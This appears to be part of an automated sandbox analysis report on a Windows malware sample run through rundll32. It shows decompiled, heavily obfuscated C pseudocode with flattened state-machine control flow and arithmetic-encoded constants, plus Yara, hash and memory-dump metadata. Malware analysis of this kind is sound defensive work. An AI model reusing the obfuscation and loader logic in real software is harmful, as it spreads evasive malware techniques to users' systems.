                                                                      				_v624 = 0x82fc;
                                                                      				_t352 = 0x4d;
                                                                      				_t349 = _v544;
                                                                      				_t316 = _v544;
                                                                      				_v624 = _v624 * 0xb;
                                                                      				_v624 = _v624 ^ 0xf6599f92;
                                                                      				_v624 = _v624 ^ 0xf65c714c;
                                                                      				_v572 = 0x87e5;
                                                                      				_v572 = _v572 | 0x0de14e4e;
                                                                      				_v572 = _v572 ^ 0x0de1e3d5;
                                                                      				_v580 = 0xaa00;
                                                                      				_v580 = _v580 >> 0xf;
                                                                      				_v580 = _v580 ^ 0x00000356;
                                                                      				_v596 = 0x78ee;
                                                                      				_v596 = _v596 * 0x44;
                                                                      				_v596 = _v596 >> 1;
                                                                      				_v596 = _v596 ^ 0x00108f9c;
                                                                      				_v648 = 0x727e;
                                                                      				_t353 = _v548;
                                                                      				_v648 = _v648 / _t352;
                                                                      				_v648 = _v648 ^ 0x94612659;
                                                                      				_v648 = _v648 + 0xffff79fc;
                                                                      				_v648 = _v648 ^ 0x9460d1f8;
                                                                      				_v644 = 0x1b66;
                                                                      				_v644 = _v644 ^ 0x7f7a90b3;
                                                                      				_v644 = _v644 ^ 0x38b35886;
                                                                      				_v644 = _v644 ^ 0x47c9d350;
                                                                      				while(1) {
                                                                      					_t300 = 0xbce5228;
                                                                      					L2:
                                                                      					while(_t317 != 0x31c8274) {
                                                                      						if(_t317 == 0x6eb678d) {
                                                                      							E01FFF1ED(_v572, _v580, _v596, _v648, _t316);
                                                                      						} else {
                                                                      							if(_t317 == _t300) {
                                                                      								_t306 = E01FFACE6(_t349, _v552, _t317, _t317, _t316, _t353, _v568, _v652, _v668, _v608, _t317,  &_v540, _v660, _v560);
                                                                      								_t357 =  &(_t357[0xc]);
                                                                      								__eflags = _t306;
                                                                      								if(_t306 != 0) {
                                                                      									_t354 = _t349;
                                                                      									while(1) {
                                                                      										__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
                                                                      										if( *((intOrPtr*)(_t354 + 4)) != 4) {
                                                                      											goto L17;
                                                                      										}
                                                                      										L16:
                                                                      										_t309 = E01FF7F4B(_t354 + 0xc, _v680, _v544, _v556, _v640);
                                                                      										_t357 =  &(_t357[3]);
                                                                      										__eflags = _t309;
                                                                      										if(_t309 == 0) {
                                                                      											_t355 = 1;
                                                                      											__eflags = 1;
                                                                      										} else {
                                                                      											goto L17;
                                                                      										}
                                                                      										L20:
                                                                      										_t353 = _v548;
                                                                      										goto L21;
                                                                      										L17:
                                                                      										_t308 =  *_t354;
                                                                      										__eflags = _t308;
                                                                      										if(_t308 != 0) {
                                                                      											_t354 = _t354 + _t308;
                                                                      											__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
                                                                      											if( *((intOrPtr*)(_t354 + 4)) != 4) {
                                                                      												goto L17;
                                                                      											}
                                                                      										}
                                                                      										goto L20;
                                                                      									}
                                                                      								}
                                                                      								L21:
                                                                      								__eflags = _t355;
                                                                      								if(__eflags == 0) {
                                                                      									_t300 = 0xbce5228;
                                                                      									_t317 = 0xbce5228;
                                                                      									continue;
                                                                      								} else {
                                                                      									E02002551(_v636,  *((intOrPtr*)( *0x2011090 + 0x1c)), _v672);
                                                                      									_t317 = 0xc17c725;
                                                                      									while(1) {
                                                                      										_t300 = 0xbce5228;
                                                                      										goto L2;
                                                                      									}
                                                                      								}
                                                                      								L31:
                                                                      							} else {
                                                                      								if(_t317 == 0xc17c725) {
                                                                      									E01FFDE81(_v576, _t349, _v624);
                                                                      									_t317 = 0x6eb678d;
                                                                      									while(1) {
                                                                      										_t300 = 0xbce5228;
                                                                      										goto L2;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t317 == 0x1e086586) {
                                                                      										_t317 = 0x1e3f627f;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t317 == 0x1e3f627f) {
                                                                      											_push(_t317);
                                                                      											E01FFDFD8(_v632,  &_v520, __eflags, _v616, _v620);
                                                                      											_t312 = E01FFBDCC( &_v520, _v600, _v676, _v564);
                                                                      											_t357 =  &(_t357[5]);
                                                                      											_v544 = _t312;
                                                                      											 *((short*)(_t312 - 2)) = 0;
                                                                      											_t317 = 0x31c8274;
                                                                      											while(1) {
                                                                      												_t300 = 0xbce5228;
                                                                      												goto L2;
                                                                      											}
                                                                      										} else {
                                                                      											if(_t317 != 0x265fc3c2) {
                                                                      												L27:
                                                                      												__eflags = _t317 - 0x2fa258b4;
                                                                      												if(__eflags != 0) {
                                                                      													continue;
                                                                      												} else {
                                                                      												}
                                                                      											} else {
                                                                      												_t353 = 0x1000;
                                                                      												_push(_t317);
                                                                      												_v548 = 0x1000;
                                                                      												_t349 = E01FF54FB(0x1000);
                                                                      												_t300 = 0xbce5228;
                                                                      												_t317 =  !=  ? 0xbce5228 : 0x6eb678d;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L30:
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      						goto L31;
                                                                      					}
                                                                      					_push(_t317);
                                                                      					_t302 = E0200C0C8(_v604 | 0x00000006, 1, _v656,  &_v520, _v612, _v588, 0x2000000, _v664, _t317, _v644, _v628);
                                                                      					_t316 = _t302;
                                                                      					_t357 =  &(_t357[0xa]);
                                                                      					__eflags = _t302 - 0xffffffff;
                                                                      					if(__eflags == 0) {
                                                                      						_t317 = 0x2fa258b4;
                                                                      						_t300 = 0xbce5228;
                                                                      						goto L27;
                                                                      					} else {
                                                                      						_t317 = 0x265fc3c2;
                                                                      						continue;
                                                                      					}
                                                                      					goto L30;
                                                                      				}
                                                                      			}



























































                                                                      0x020090fa
                                                                      0x020090fc
                                                                      0x02009109
                                                                      0x00000000
                                                                      0x02009109
                                                                      0x020090d8
                                                                      0x020090d0
                                                                      0x020090c4
                                                                      0x020090b8
                                                                      0x020090ac
                                                                      0x020092bc
                                                                      0x020092bc
                                                                      0x020092c5
                                                                      0x00000000
                                                                      0x020092c5
                                                                      0x02009232
                                                                      0x02009269
                                                                      0x0200926e
                                                                      0x02009270
                                                                      0x02009273
                                                                      0x02009276
                                                                      0x02009282
                                                                      0x02009287
                                                                      0x00000000
                                                                      0x02009278
                                                                      0x02009278
                                                                      0x00000000
                                                                      0x02009278
                                                                      0x00000000
                                                                      0x02009276

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: $W^$%n$/3$<_$?0$NN$~r$Y$x
                                                                      • API String ID: 1586166983-2889033865
                                                                      • Opcode ID: 3a9336997b49d9581de405af0501b4296a541a293a598388dd719778ada8fa42
                                                                      • Instruction ID: 9ea793fe65b73f1f1f9c844d588389460ee411a0ad705a07ef0fb6eaaf73ae68
                                                                      • Opcode Fuzzy Hash: 3a9336997b49d9581de405af0501b4296a541a293a598388dd719778ada8fa42
                                                                      • Instruction Fuzzy Hash: 23F1377150C3819FE369CF65C489A5BBBF1BBC5748F108A1CE1EA862A0C7B58905DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $W^$%n$/3$<_$?0$NN$~r$Y$x
                                                                      • API String ID: 0-2889033865
                                                                      • Opcode ID: 3561bd756a9f9aeff14da6113689aaba5774f717805bc6e0dedea9d8832401fc
                                                                      • Instruction ID: ed4dd153620d7a2af4a5b334e09c79308a74a4dd8d6a8dc2896375912ffd2412
                                                                      • Opcode Fuzzy Hash: 3561bd756a9f9aeff14da6113689aaba5774f717805bc6e0dedea9d8832401fc
                                                                      • Instruction Fuzzy Hash: 13F1347152C3819FD3A8CF25C449A5FBBF1BB85748F108A1CF19A962A0CBB58919CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E01FFA821() {
                                                                      				char _v520;
                                                                      				intOrPtr _v524;
                                                                      				intOrPtr _v528;
                                                                      				intOrPtr _v532;
                                                                      				intOrPtr _v536;
                                                                      				signed int _v540;
                                                                      				signed int _v544;
                                                                      				signed int _v548;
                                                                      				signed int _v552;
                                                                      				signed int _v556;
                                                                      				signed int _v560;
                                                                      				signed int _v564;
                                                                      				signed int _v568;
                                                                      				signed int _v572;
                                                                      				signed int _v576;
                                                                      				signed int _v580;
                                                                      				signed int _v584;
                                                                      				signed int _v588;
                                                                      				signed int _v592;
                                                                      				signed int _v596;
                                                                      				signed int _v600;
                                                                      				signed int _v604;
                                                                      				signed int _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				signed int _v620;
                                                                      				signed int _v624;
                                                                      				intOrPtr _t237;
                                                                      				signed int _t241;
                                                                      				void* _t248;
                                                                      				void* _t254;
                                                                      				signed int _t280;
                                                                      				signed int _t281;
                                                                      				signed int _t282;
                                                                      				signed int _t283;
                                                                      				signed int _t284;
                                                                      				signed int _t285;
                                                                      				signed int _t286;
                                                                      				intOrPtr _t287;
                                                                      				signed int* _t289;
                                                                      				void* _t291;
                                                                      
                                                                      				_t289 =  &_v624;
                                                                      				_v536 = 0x626641;
                                                                      				_v532 = 0x129981;
                                                                      				_t287 = 0;
                                                                      				_v528 = 0;
                                                                      				_t254 = 0x2e28b741;
                                                                      				_v524 = 0;
                                                                      				_v624 = 0x9755;
                                                                      				_v624 = _v624 + 0xffff0ffe;
                                                                      				_v624 = _v624 ^ 0x28143b3a;
                                                                      				_v624 = _v624 + 0xffff9fa9;
                                                                      				_v624 = _v624 ^ 0xd7eb3c0e;
                                                                      				_v616 = 0x61ff;
                                                                      				_v616 = _v616 + 0xfffff5a9;
                                                                      				_v616 = _v616 ^ 0x00005781;
                                                                      				_v540 = 0x95c8;
                                                                      				_v540 = _v540 << 7;
                                                                      				_v540 = _v540 ^ 0x004af40b;
                                                                      				_v600 = 0xc6a5;
                                                                      				_v600 = _v600 + 0xaa28;
                                                                      				_v600 = _v600 + 0xffff351e;
                                                                      				_v600 = _v600 ^ 0x0000ff25;
                                                                      				_v552 = 0xb452;
                                                                      				_t280 = 7;
                                                                      				_v552 = _v552 * 0x64;
                                                                      				_v552 = _v552 ^ 0x0046227b;
                                                                      				_v576 = 0xc6c;
                                                                      				_v576 = _v576 / _t280;
                                                                      				_v576 = _v576 + 0xffff179a;
                                                                      				_v576 = _v576 ^ 0xffff33c6;
                                                                      				_v544 = 0xf54b;
                                                                      				_v544 = _v544 ^ 0xb6fccf77;
                                                                      				_v544 = _v544 ^ 0xb6fc572e;
                                                                      				_v560 = 0xea94;
                                                                      				_v560 = _v560 ^ 0x74db7c03;
                                                                      				_v560 = _v560 ^ 0x74dbf042;
                                                                      				_v572 = 0x748e;
                                                                      				_v572 = _v572 >> 0xa;
                                                                      				_v572 = _v572 | 0x7bc5136c;
                                                                      				_v572 = _v572 ^ 0x7bc5304b;
                                                                      				_v612 = 0xe3c8;
                                                                      				_v612 = _v612 >> 0xa;
                                                                      				_v612 = _v612 << 4;
                                                                      				_t281 = 0x18;
                                                                      				_v612 = _v612 / _t281;
                                                                      				_v612 = _v612 ^ 0x0000698f;
                                                                      				_v568 = 0x502b;
                                                                      				_v568 = _v568 | 0xfd850b4b;
                                                                      				_v568 = _v568 ^ 0xfd8572e2;
                                                                      				_v584 = 0x41d1;
                                                                      				_t282 = 0x50;
                                                                      				_v584 = _v584 / _t282;
                                                                      				_v584 = _v584 << 6;
                                                                      				_v584 = _v584 ^ 0x000070a2;
                                                                      				_v588 = 0x111;
                                                                      				_v588 = _v588 >> 0xb;
                                                                      				_v588 = _v588 << 0x10;
                                                                      				_v588 = _v588 ^ 0x000020f0;
                                                                      				_v608 = 0xeb8a;
                                                                      				_v608 = _v608 << 9;
                                                                      				_v608 = _v608 << 7;
                                                                      				_v608 = _v608 * 0x63;
                                                                      				_v608 = _v608 ^ 0x165e3696;
                                                                      				_v548 = 0x5039;
                                                                      				_v548 = _v548 << 5;
                                                                      				_v548 = _v548 ^ 0x000a43df;
                                                                      				_v596 = 0x4562;
                                                                      				_v596 = _v596 + 0x2a80;
                                                                      				_t283 = 0x26;
                                                                      				_v596 = _v596 * 0x30;
                                                                      				_v596 = _v596 ^ 0x00148087;
                                                                      				_v624 = 0x923e;
                                                                      				_v624 = _v624 / _t283;
                                                                      				_t284 = 0x7c;
                                                                      				_v624 = _v624 / _t284;
                                                                      				_v624 = _v624 ^ 0x19d80190;
                                                                      				_v624 = _v624 ^ 0x19d83119;
                                                                      				_v564 = 0xf45b;
                                                                      				_v564 = _v564 << 0xd;
                                                                      				_v564 = _v564 ^ 0x1e8b638e;
                                                                      				_v616 = 0xdafb;
                                                                      				_v616 = _v616 | 0xdd6b0501;
                                                                      				_v616 = _v616 ^ 0xdd6b820b;
                                                                      				_v580 = 0xc4fe;
                                                                      				_t285 = 0x6c;
                                                                      				_v580 = _v580 * 0x2e;
                                                                      				_v580 = _v580 << 3;
                                                                      				_v580 = _v580 ^ 0x011b5ac6;
                                                                      				_v556 = 0xca0a;
                                                                      				_v556 = _v556 + 0xe013;
                                                                      				_v556 = _v556 ^ 0x00019dbb;
                                                                      				_v604 = 0x6c6f;
                                                                      				_v604 = _v604 >> 0x10;
                                                                      				_v604 = _v604 << 8;
                                                                      				_v604 = _v604 ^ 0x00007655;
                                                                      				_v592 = 0xed8d;
                                                                      				_v592 = _v592 + 0x2fd9;
                                                                      				_t286 = _v616;
                                                                      				_v592 = _v592 / _t285;
                                                                      				_v592 = _v592 ^ 0x000f029b;
                                                                      				while(1) {
                                                                      					_t291 = _t254 - 0x2e28b741;
                                                                      					if(_t291 > 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					L2:
                                                                      					if(_t291 == 0) {
                                                                      						_push(_t254);
                                                                      						_t241 = E01FF54FB(0x45c);
                                                                      						 *0x2011088 = _t241;
                                                                      						__eflags = _t241;
                                                                      						if(_t241 == 0) {
                                                                      							L23:
                                                                      							return _t287;
                                                                      						}
                                                                      						 *((intOrPtr*)(_t241 + 0x10)) = E02002C05;
                                                                      						_t254 = 0x1b0f9495;
                                                                      						continue;
                                                                      						do {
                                                                      							while(1) {
                                                                      								_t291 = _t254 - 0x2e28b741;
                                                                      								if(_t291 > 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      								goto L2;
                                                                      							}
                                                                      							goto L16;
                                                                      							L22:
                                                                      							__eflags = _t254 - 0x2142cdf5;
                                                                      						} while (_t254 != 0x2142cdf5);
                                                                      						goto L23;
                                                                      					}
                                                                      					if(_t254 == 0x1f0026e) {
                                                                      						_v620 = 0xbbec;
                                                                      						_t254 = 0x21dfc09c;
                                                                      						_v620 = _v620 >> 0x10;
                                                                      						_v620 = _v620 ^ 0x00000029;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t254 == 0x1b0f9495) {
                                                                      						_t286 = E0200340E(_v552, _v576, _t254, _t254, _v592);
                                                                      						_t289 =  &(_t289[3]);
                                                                      						__eflags = _t286;
                                                                      						if(_t286 == 0) {
                                                                      							_t254 = 0x3b91f90e;
                                                                      						} else {
                                                                      							 *((intOrPtr*)( *0x2011088 + 0x244)) = 1;
                                                                      							_t254 = 0x1f0026e;
                                                                      						}
                                                                      						continue;
                                                                      					}
                                                                      					if(_t254 == 0x21dfc09c) {
                                                                      						E01FF5AB8(_v544, _v560, _v572, _v612, _t286);
                                                                      						_t289 =  &(_t289[3]);
                                                                      						L9:
                                                                      						_t254 = 0x28cf3aa7;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t254 != 0x28cf3aa7) {
                                                                      						goto L22;
                                                                      					}
                                                                      					_push(_t254);
                                                                      					E01FF471A(_v620,  *0x2011088 + 0x254, _v568, _v584, _v588, _v608, _v548);
                                                                      					_t289 =  &(_t289[8]);
                                                                      					_t254 = 0x36e34156;
                                                                      					_t248 = 1;
                                                                      					_t287 =  ==  ? _t248 : _t287;
                                                                      					continue;
                                                                      					L16:
                                                                      					__eflags = _t254 - 0x36cafd3f;
                                                                      					if(__eflags == 0) {
                                                                      						_push(_t254);
                                                                      						E01FFDFD8(_v596,  &_v520, __eflags, _v624, _v564);
                                                                      						_t237 = E01FF165C( &_v520, _v616, _v580, _v556, _v604);
                                                                      						_t289 =  &(_t289[6]);
                                                                      						 *((intOrPtr*)( *0x2011088)) = _t237;
                                                                      						_t254 = 0x2142cdf5;
                                                                      						goto L22;
                                                                      					}
                                                                      					__eflags = _t254 - 0x36e34156;
                                                                      					if(_t254 == 0x36e34156) {
                                                                      						E02001F88();
                                                                      						_t254 = 0x36cafd3f;
                                                                      						continue;
                                                                      					}
                                                                      					__eflags = _t254 - 0x3b91f90e;
                                                                      					if(_t254 != 0x3b91f90e) {
                                                                      						goto L22;
                                                                      					}
                                                                      					_v620 = 0xad6;
                                                                      					_v620 = _v620 * 0x11;
                                                                      					_v620 = _v620 * 0x50;
                                                                      					_v620 = _v620 | 0x0e445f63;
                                                                      					_v620 = _v620 ^ 0x0e7ddfff;
                                                                      					 *((intOrPtr*)( *0x2011088 + 0x14)) = E02005153;
                                                                      					goto L9;
                                                                      				}
                                                                      			}













































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
                                                                      • API String ID: 0-509329050
                                                                      • Opcode ID: a3b957fd28c24f7509ad5d4055413b3cdc46758c120e9a3609d685244bdffe37
                                                                      • Instruction ID: 770b247dda1b6b42fbc05c0d5b35b6730acf5682d582fc99e438c433aa0c6a94
                                                                      • Opcode Fuzzy Hash: a3b957fd28c24f7509ad5d4055413b3cdc46758c120e9a3609d685244bdffe37
                                                                      • Instruction Fuzzy Hash: 28C124715083419BD358CF25D98991BFBE2BFC4748F144A1DF29A962A0D3BAC949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
                                                                      • API String ID: 0-509329050
                                                                      • Opcode ID: 27d1c86281592c8a67a6d0984c4acc852d1cd64e5b51b914d83d14640b456d49
                                                                      • Instruction ID: 9a1eebfe91b24e93c1db07c086fc550f6d3b18597da2cd89055520984b20d9c5
                                                                      • Opcode Fuzzy Hash: 27d1c86281592c8a67a6d0984c4acc852d1cd64e5b51b914d83d14640b456d49
                                                                      • Instruction Fuzzy Hash: 3AC132B11183819BD358CF25C58991BFBE1BBD4B48F104A2EF1D6962A0C3BAC959CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E02006BE4(signed int __ecx, intOrPtr* __edx) {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				char _v1560;
                                                                      				signed int _v1564;
                                                                      				intOrPtr _v1568;
                                                                      				intOrPtr _v1572;
                                                                      				signed int _v1576;
                                                                      				unsigned int _v1580;
                                                                      				signed int _v1584;
                                                                      				signed int _v1588;
                                                                      				unsigned int _v1592;
                                                                      				signed int _v1596;
                                                                      				signed int _v1600;
                                                                      				signed int _v1604;
                                                                      				signed int _v1608;
                                                                      				signed int _v1612;
                                                                      				signed int _v1616;
                                                                      				signed int _v1620;
                                                                      				signed int _v1624;
                                                                      				signed int _v1628;
                                                                      				signed int _v1632;
                                                                      				unsigned int _v1636;
                                                                      				signed int _v1640;
                                                                      				signed int _v1644;
                                                                      				signed int _v1648;
                                                                      				signed int _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				signed int _v1672;
                                                                      				signed int _v1676;
                                                                      				signed int _v1680;
                                                                      				signed int _t245;
                                                                      				signed int _t255;
                                                                      				signed int _t259;
                                                                      				signed int _t261;
                                                                      				signed int _t262;
                                                                      				signed int _t284;
                                                                      				void* _t285;
                                                                      				signed int _t288;
                                                                      				intOrPtr* _t292;
                                                                      				signed int* _t293;
                                                                      
                                                                      				_t293 =  &_v1680;
                                                                      				_t292 = __edx;
                                                                      				_t259 = __ecx;
                                                                      				_v1564 = _v1564 & 0x00000000;
                                                                      				_v1572 = 0x37b7f6;
                                                                      				_v1568 = 0x1b2ce7;
                                                                      				_v1632 = 0xec6c;
                                                                      				_v1632 = _v1632 | 0x543bf563;
                                                                      				_v1632 = _v1632 ^ 0x543bfd46;
                                                                      				_v1636 = 0xa23a;
                                                                      				_v1636 = _v1636 ^ 0x26fe42ca;
                                                                      				_v1636 = _v1636 >> 0xa;
                                                                      				_v1636 = _v1636 ^ 0x0009dc41;
                                                                      				_v1592 = 0x1eb7;
                                                                      				_v1592 = _v1592 >> 6;
                                                                      				_v1592 = _v1592 ^ 0x000051d7;
                                                                      				_v1668 = 0xa1e9;
                                                                      				_v1668 = _v1668 | 0x5efbd7df;
                                                                      				_v1668 = _v1668 ^ 0xd3f751b9;
                                                                      				_v1668 = _v1668 ^ 0x8d0c9003;
                                                                      				_v1600 = 0x7d57;
                                                                      				_v1600 = _v1600 >> 0xa;
                                                                      				_v1600 = _v1600 ^ 0x00001a4f;
                                                                      				_v1608 = 0xd589;
                                                                      				_v1608 = _v1608 | 0xf26b7913;
                                                                      				_v1608 = _v1608 << 1;
                                                                      				_v1608 = _v1608 ^ 0xe4d78fb5;
                                                                      				_v1660 = 0xf169;
                                                                      				_v1660 = _v1660 * 0x1f;
                                                                      				_t285 = 0x2a877a8b;
                                                                      				_t261 = 0x5a;
                                                                      				_v1660 = _v1660 * 7;
                                                                      				_v1660 = _v1660 << 1;
                                                                      				_v1660 = _v1660 ^ 0x019971bd;
                                                                      				_v1676 = 0xe75c;
                                                                      				_v1676 = _v1676 + 0xc4d1;
                                                                      				_v1676 = _v1676 << 0xf;
                                                                      				_v1676 = _v1676 + 0xffffa84d;
                                                                      				_v1676 = _v1676 ^ 0xd6161939;
                                                                      				_v1672 = 0xb9d6;
                                                                      				_v1672 = _v1672 | 0xb865191f;
                                                                      				_v1672 = _v1672 ^ 0x5b4935e3;
                                                                      				_v1672 = _v1672 << 0xd;
                                                                      				_v1672 = _v1672 ^ 0x9187b9b3;
                                                                      				_v1680 = 0xc4d6;
                                                                      				_v1680 = _v1680 + 0x7c91;
                                                                      				_v1680 = _v1680 + 0xf8dc;
                                                                      				_v1680 = _v1680 * 0x27;
                                                                      				_v1680 = _v1680 ^ 0x0056b694;
                                                                      				_v1616 = 0xc221;
                                                                      				_v1616 = _v1616 / _t261;
                                                                      				_v1616 = _v1616 * 0x3f;
                                                                      				_v1616 = _v1616 ^ 0x0000fe69;
                                                                      				_v1652 = 0xbd2c;
                                                                      				_v1652 = _v1652 ^ 0xe1569e35;
                                                                      				_v1652 = _v1652 << 0xf;
                                                                      				_v1652 = _v1652 + 0xffff718d;
                                                                      				_v1652 = _v1652 ^ 0x118bace2;
                                                                      				_v1580 = 0x567b;
                                                                      				_v1580 = _v1580 >> 0x10;
                                                                      				_v1580 = _v1580 ^ 0x00003991;
                                                                      				_v1576 = 0x298;
                                                                      				_v1576 = _v1576 << 7;
                                                                      				_v1576 = _v1576 ^ 0x000109d6;
                                                                      				_v1588 = 0xb305;
                                                                      				_v1588 = _v1588 * 0x60;
                                                                      				_v1588 = _v1588 ^ 0x00433d2e;
                                                                      				_v1584 = 0x64b3;
                                                                      				_v1584 = _v1584 >> 0xd;
                                                                      				_v1584 = _v1584 ^ 0x000018d8;
                                                                      				_v1624 = 0xad96;
                                                                      				_t262 = 0x50;
                                                                      				_v1624 = _v1624 / _t262;
                                                                      				_v1624 = _v1624 * 0x13;
                                                                      				_v1624 = _v1624 ^ 0x00007713;
                                                                      				_v1664 = 0x908a;
                                                                      				_v1664 = _v1664 >> 6;
                                                                      				_v1664 = _v1664 << 4;
                                                                      				_v1664 = _v1664 >> 8;
                                                                      				_v1664 = _v1664 ^ 0x00007bdf;
                                                                      				_v1644 = 0x7153;
                                                                      				_v1644 = _v1644 + 0xffffa87a;
                                                                      				_v1644 = _v1644 << 0xd;
                                                                      				_v1644 = _v1644 ^ 0x0339cebf;
                                                                      				_v1640 = 0x1652;
                                                                      				_v1640 = _v1640 << 0xa;
                                                                      				_v1640 = _v1640 >> 9;
                                                                      				_v1640 = _v1640 ^ 0x00000730;
                                                                      				_v1612 = 0x36fe;
                                                                      				_v1612 = _v1612 >> 5;
                                                                      				_v1612 = _v1612 << 3;
                                                                      				_v1612 = _v1612 ^ 0x000008d8;
                                                                      				_v1596 = 0x1208;
                                                                      				_v1596 = _v1596 >> 6;
                                                                      				_v1596 = _v1596 ^ 0x00000ad2;
                                                                      				_v1656 = 0xf95a;
                                                                      				_v1656 = _v1656 ^ 0x8de5a0e4;
                                                                      				_v1656 = _v1656 + 0xffff7609;
                                                                      				_v1656 = _v1656 + 0xc07d;
                                                                      				_v1656 = _v1656 ^ 0x8de5882f;
                                                                      				_v1620 = 0xca5e;
                                                                      				_v1620 = _v1620 | 0x2303d271;
                                                                      				_v1620 = _v1620 + 0xcb9;
                                                                      				_v1620 = _v1620 ^ 0x2303c846;
                                                                      				_v1628 = 0x9429;
                                                                      				_v1628 = _v1628 >> 7;
                                                                      				_v1628 = _v1628 >> 2;
                                                                      				_v1628 = _v1628 ^ 0x0000014e;
                                                                      				_v1648 = 0x513a;
                                                                      				_v1648 = _v1648 >> 0xf;
                                                                      				_v1648 = _v1648 | 0xb7f5bffb;
                                                                      				_v1648 = _v1648 ^ 0xb7f5b057;
                                                                      				_v1604 = 0xa39d;
                                                                      				_v1604 = _v1604 + 0xffffa1e7;
                                                                      				_v1604 = _v1604 ^ 0x00005123;
                                                                      				_t284 = _v1604;
                                                                      				while(_t285 != 0xa9a8994) {
                                                                      					if(_t285 == 0x1592b590) {
                                                                      						_push( &_v520);
                                                                      						_push(0x1ff1000);
                                                                      						_t245 = E0200B165(_t259, _t292);
                                                                      						asm("sbb esi, esi");
                                                                      						_t288 =  ~_t245 & 0xf51449f8;
                                                                      						L10:
                                                                      						_t285 = _t288 + 0x29fbdc3d;
                                                                      						L8:
                                                                      						_t262 = 0x50;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t285 == 0x1f102635) {
                                                                      						_push(_t262);
                                                                      						E01FF471A(_v1632,  &_v1040, _v1668, _v1600, _v1608, _v1660, _v1676);
                                                                      						_push(0x1ff10b0);
                                                                      						_push(_v1652);
                                                                      						_push(_v1616);
                                                                      						E01FFA4D7(__eflags, _v1576, _v1588, _v1584, _v1624, E01FF5DFC(_v1672, _v1680, __eflags),  &_v1040,  &_v1560,  &_v520);
                                                                      						E02000D6D(_v1664, _v1644, _v1640, _t248);
                                                                      						_push(0);
                                                                      						_push( &_v1560);
                                                                      						_push(_v1628);
                                                                      						_push(_v1620);
                                                                      						_push(_v1656);
                                                                      						_push(_v1596);
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_t255 = E01FF6417(_v1612, __eflags);
                                                                      						_t293 =  &(_t293[0x1d]);
                                                                      						asm("sbb esi, esi");
                                                                      						_t288 =  ~_t255 & 0xe09ead57;
                                                                      						__eflags = _t288;
                                                                      						goto L10;
                                                                      					}
                                                                      					if(_t285 == 0x29fbdc3d) {
                                                                      						return E01FFDE81(_v1648, _t284, _v1604);
                                                                      					}
                                                                      					if(_t285 != 0x2a877a8b) {
                                                                      						L13:
                                                                      						__eflags = _t285 - 0x1e6f5ee2;
                                                                      						if(_t285 != 0x1e6f5ee2) {
                                                                      							continue;
                                                                      						} else {
                                                                      							return _t255;
                                                                      						}
                                                                      						L16:
                                                                      						return _t255;
                                                                      					}
                                                                      					_push(_t262);
                                                                      					_t255 = E01FF54FB(_t262);
                                                                      					_t284 = _t255;
                                                                      					if(_t284 != 0) {
                                                                      						_t285 = 0x1592b590;
                                                                      						goto L8;
                                                                      					}
                                                                      					goto L16;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t284 + 0x44)) = _t259;
                                                                      				_t285 = 0x1e6f5ee2;
                                                                      				 *_t284 =  *0x2011084;
                                                                      				 *0x2011084 = _t284;
                                                                      				goto L13;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
